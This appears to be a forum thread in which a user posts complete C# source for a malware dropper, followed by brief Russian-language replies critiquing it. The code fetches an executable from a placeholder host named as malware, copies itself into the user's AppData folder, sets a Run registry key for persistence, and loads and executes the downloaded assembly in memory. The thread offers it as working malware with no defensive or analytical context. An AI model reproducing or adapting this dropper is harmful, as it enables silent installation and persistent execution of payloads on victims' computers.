C# Dropper

[Xzedin]

using System;
using System.IO;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Threading;
using Microsoft.Win32;

namespace ioDrop
{
    class Program
    {
        public static void Main()
        {
            byte[] payloadBuffer = DownloadPayload(@"http://example.com/malware.exe");

            if (InstallPayload(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\payload.exe"))
                Environment.Exit(0);
            else
                RunPayload(payloadBuffer);
        }

        private static bool InstallPayload(string dropPath)
        {
            if (!Process.GetCurrentProcess().MainModule.FileName.Equals(dropPath, StringComparison.CurrentCultureIgnoreCase))
            {
                FileStream FS = null;
                try
                {
                    if (!File.Exists(dropPath))
                        FS = new FileStream(dropPath, FileMode.CreateNew);
                    else
                        FS = new FileStream(dropPath, FileMode.Create);
                    byte[] loaderBuffer = File.ReadAllBytes(Process.GetCurrentProcess().MainModule.FileName);
                    FS.Write(loaderBuffer, 0, loaderBuffer.Length);
                    FS.Dispose();
                    Registry.CurrentUser.CreateSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run\").SetValue(Path.GetFileName(dropPath), dropPath);
                    Process.Start(dropPath);
                    return true;
                }
                catch
                {
                    return false;
                }
            }
            return false;
        }

        private static byte[] DownloadPayload(string url)
        {
        redownload:
            try
            {
                HttpWebRequest httpRequest = (HttpWebRequest)WebRequest.Create(url);
                httpRequest.Method = WebRequestMethods.Http.Get;
                HttpWebResponse httpResponse = (HttpWebResponse)httpRequest.GetResponse();
                Stream httpResponseStream = httpResponse.GetResponseStream();

                using (MemoryStream memoryStream = new MemoryStream())
                {
                    httpResponseStream.CopyTo(memoryStream);
                    httpResponse.Close();
                    httpResponseStream.Dispose();
                    return memoryStream.ToArray();
                }
            }
            catch
            {
                Thread.Sleep(5000);
                goto redownload;
            }
        }

        private static void RunPayload(byte[] payload)
        {
            new Thread(() =>
            {
                try
                {
                    Assembly asm = AppDomain.CurrentDomain.Load(payload);
                    MethodInfo Metinf = asm.EntryPoint;
                    object InjObj = asm.CreateInstance(Metinf.Name);
                    object[] parameters = new object[1];
                    if (Metinf.GetParameters().Length == 0)
                    {
                        parameters = null;
                    }
                    Metinf.Invoke(InjObj, parameters);
                }
                catch { }
            })
            { IsBackground = false }.Start();
        }
    }
}

 

[Adderall]

не чего нового просто скачивание запуск из памяти / натив файлы не будут работать

 

[89t0rIhnt]

Не знал что в C# есть goto

 

[AlexKulin]

Дичь...

 

[bloodcatz]

Это ChatGPT писал?